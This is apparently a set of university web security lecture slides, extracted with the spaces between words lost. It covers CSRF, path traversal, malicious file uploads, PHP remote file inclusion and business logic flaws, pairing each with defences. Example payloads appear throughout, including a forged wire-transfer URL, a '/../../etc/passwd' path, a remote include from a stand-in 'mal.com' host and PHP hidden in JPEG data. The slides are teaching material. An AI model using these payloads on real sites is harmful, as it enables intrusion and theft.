Web CSRF and Attacks - pdfs.semanticscholar.org€¦ · CSRF Server-Side Defenses •Synchronizer token –Random token embedded by server in all HTML forms and verified by server

WebSecurityCross-SiteRequestForgery

AttacksonServers

28/02/17 Web Security 1

Cross-SiteRequestForgery

Cross-SiteRequestForgery(CSRF)• Maliciouswebsitehasscriptthatredirectsandissuesarequestontargetwebsite– E.g.,document.location =“https://bank.com/wiretransfer.php?amount=10000&recipient=Attacker&account=2567”

• Ifuserisalreadyloggedinontargetwebsite…• Requestisexecutedbytargetwebsiteonbehalfofuser

– E.g.,fundsaretransferredfromtheusertotheattacker


LoginCSRF• Malicioussiteincludeslinkorformthatlogsinvictimwithattacker’saccountonCSRFvulnerablesite

• Subsequentvictim’sinteractionwithCSRFvulnerablesiteissharedwithattacker– Navigationinvulnerablesite– Datasuppliedtovulnerablesite– …


CSRFTrustRelationship

• Vulnerablesitetrustsuser(login)

• Usertrustsevilsite

• Evilsitecouldbehackedlegitimatesite


Victim’sBrowser

CSRFVulnerableWebsite

EvilWebsite

MaliciousRequest

LegitimateRequest

Login

CSRFServer-SideDefenses• Synchronizertoken

– RandomtokenembeddedbyserverinallHTMLformsandverifiedbyserver

– CSRFrequestrejectedbecauseattackercannotguesstoken

• CustomHTTPheader– Onlogin,websitesetsacookiecontainingrandomvalue– ClientsidescriptreadscookieandcopiesitintocustomHTTPheadersentwitheachtransactionalrequest

– SecuritybasedonbrowsernottransmittingcustomHTTPheadersacrossdifferentservers


FirefoxAdd-onRequestPolicy(RP)

• RPsetsdefaultdenypolicyforcross-siterequests

• Cross-siterequestsarethosemadetoasitedifferentfromcurrentone

• RPallowstowhitelistcross-siterequestsbyoriginand/ordestinationsite


ImproperPathSanitization

© 2016 J. Liebow-Feeser, B. Palazzi, R. Tamassia, CC BY-SA 2.5Brown University CS166


• Problem:onlysomepathsarevalid;whichones?

• Improperpathsanitizationcanleadtodisallowedresourcesbeingaccessed

• Whatsortsofresources/pathsmightwewanttomakeoff-limits?



• Whatsortsofresources/pathsmightwewanttomakeoff-limits?

–Configurationfiles(e.g.,Apache’s.htaccess)–Filesoutsidethewebroot–Filesoutsidetheuploaddirectory–etc



• Attempt#1:Blacklists–e.g.,“/foo/bar isofflimits”

• What’swrongwiththis?




• What’swrongwiththis?–Multiplepathscanrefertothesameresource– /foo/bar– /foo//bar– /foo/../foo/bar– /foo/bar/baz/..




• What’swrongwiththis?–Whataboutpathsoutsidethewebroot?– /../../etc/passwd– Becomes/var/www/../../etc/passwd– (e.g.,/etc/passwd)



• Attempt#2:Whitelists–e.g.,“only/foo/bar or/baz/blah areallowed”




• Attempt#2:Whitelists–e.g.,“only/foo/bar or/baz/blah areallowed”

• What’swrongwiththis?–Howtokeepthewhitelistuptodate?–Howtobenicetousers

• e.g.,/foo//bar isreally/foo/bar



• Attempt#3:ParsePaths–e.g.,determinethatfoo.com/bar doesn’tescapewebroot




• Attempt#3:ParsePaths–e.g.,determinethatfoo.com/bar doesn’tescapewebroot

• What’swrongwiththis?–Correctparsingishard



• Solution–Whenpossible,useexistingimplementations

• Apachedoesthiscorrectly- useit

–Forcustomlogic,don’tusepaths• Storedataindatabases• Don’tusesubfolders

– e.g.,/var/uploads,my-upload.pdf– filterbadcharacters(/, \0)orbadnames(.., .)

FileUpload


FileUpload

• Apache’sPHPpluginwillexecute*.php• Whathappensifthere’sanuploaddirectoryinsidethewebroot?

–e.g.,/var/www/upload


FileUpload

• Apache’sPHPpluginwillexecute*.php• Whathappensifthere’sanuploaddirectoryinsidethewebroot?

–e.g.,/var/www/upload• Uploadmal.php• Visitfoo.com/upload/mal.php• Profit!


FileUpload

• Howtofix?


FileUpload

• Attempt#1:Disallow.php extension• Whatcouldgowrong?


FileUpload

• Attempt#1:Disallow.php extension• Whatcouldgowrong?

–WhatifIwanttouploadaPHPfile?–Notsufficientforsomeconfigurations...


FileUpload

<html><head><title>My Page</title></head><body>

<p>Date: <?php echo date(); ?></p></body></html>


FileUpload

• Uploadfoo.html:<html>

<?php do_bad_thing(); ?></html>


FileUpload

• Uploadfoo.html:<html>

<?php do_bad_thing(); ?></html>

• Howtofix?


FileUpload

• Attempt#2:Disallow*.php,*.html• And verifythatit’saproperlyformattedfile• Forexample,limittothesefiletypes:

–JPEG–PDF

• Whatcouldgowrong?


FileUpload

• Whatcouldgowrong?–JPEGsupportscomments,soembedPHPinJPEGcommentfield

–Evenifitdidn’t,wecouldstillcrafttherightpixelsequences:\x3C\x3F\x70\x68\x70 - <?php \x3F\x3E - ?>

• Howtofix?


FileUpload• Solution:don’tservefilesdirectly• Bad:foo.com/upload/foo.pdf• Good:foo.com/get.php?file=foo.pdf• Implementcustomlogicinget.php• Don’tallowaccesstouploaddirectory

– Storeoutsideofwebroot– Ifthat’snotpossible,use.htaccess orsimilar

• Watchoutforpathvulnerabilities,though!

FileInclusion


FileInclusion• PHP(andotherlanguages)allowdynamicincludes

include(‘lib.php’); • Imagineasitewithdynamically-generatedinclude:

lang = $_GET[‘lang’];include($lang . ‘.php’);

• Whatcouldgowrong?


FileInclusion• Let’ssaythere’sanadd-user.php

– Onlyincludedafterauthenticationasadmin– Can’tloaddirectly- foo.com/add-user.php

• Visitfoo.com/blah.php?lang=add-user&user=mallory&pass=l337hax0r

• Makestheinclude:include(‘add-user.php’);


FileInclusion• Canwedobetter?• ManyPHPfunctionstreatpathsasbeingfilepathsor

URLs…• Whatcouldgowrong?


FileInclusion• Canwedobetter?• ManyPHPfunctionstreatpathsasbeingfilepathsor

URLs…• Whatcouldgowrong?

– foo.com/blah.php?lang=http://mal.com/mal• Makestheinclude:

include(‘http://mal.com/mal.php’);


FileInclusion

• Solution?


FileInclusion

• Solution– Ifyouneedtodynamicallyincludefiles,keepapre-setlist:lang_files = array(‘en-US’ => ‘en-us.php’,‘en-GB’ => ‘en-GB.php’,‘en-l337’ => ‘en-l337.php’);

BusinessLogicFlaws


BusinessLogicFlaws

• “Businesslogic”isthehigh-levellogicbehindawebapplication’sfunctionality–E.g.,“Ausermustpaybeforehavinganitemshippedtothem”

• Flawsintheimplementationofthislogic(orflawsinthelogicitself)canbeserious

• Chapter11ofWAHH


BusinessLogicFlaws

• Oftencomefromamismatchbetweendeveloperassumptionsandreality

• Sincetheydifferwidely,besttogiveexamples• Thesearerealexamplesfromrealapplications


BusinessLogicFlaws

• Example1:CheatingonBulkDiscounts–Siteoffersbulkdiscountsongroupofitems–Whenanewitemisaddedtothecart,ifabulkdiscountapplies,thepricesofallitemsareloweredappropriately

–Whatcouldgowrong?


BusinessLogicFlaws

• Example1:CheatingonBulkDiscounts–Siteoffersbulkdiscountsongroupofitems–Whenanewitemisaddedtothecart,ifabulkdiscountapplies,thepricesofallitemsareloweredappropriately

–Whatcouldgowrong?– Addmanyitemstothecart,loweringprices– Deletemostofthem,checkoutwithacheapitem


BusinessLogicFlaws

• Example2:ProceedingtoCheckout– Inashoppingcartapplication,whencheckingout,userisdirectedthroughaseriesofpages:

• Fromcart,click“checkout”button• Redirectedtopagetoenterpaymentdetails• Ifpaymentverifies,redirectedtoshippingdetails• Aftershippingdetailsverified,orderiscomplete• Whatcouldgowrong?


BusinessLogicFlaws

• Example2:ProceedingtoCheckout– Inashoppingcartapplication,whencheckingout,userisdirectedthroughaseriesofpages:

• Fromcart,click“checkout”button• Redirectedtopagetoenterpaymentdetails• Ifpaymentverifies,redirectedtoshippingdetails• Aftershippingdetailsverified,orderiscomplete• Whatcouldgowrong?• Godirectlytoenteringshippingdetails,skippayment

Web CSRF and Attacks - pdfs.semanticscholar.org€¦ · CSRF Server-Side Defenses •Synchronizer token –Random token embedded by server in all HTML forms and verified by server

Documents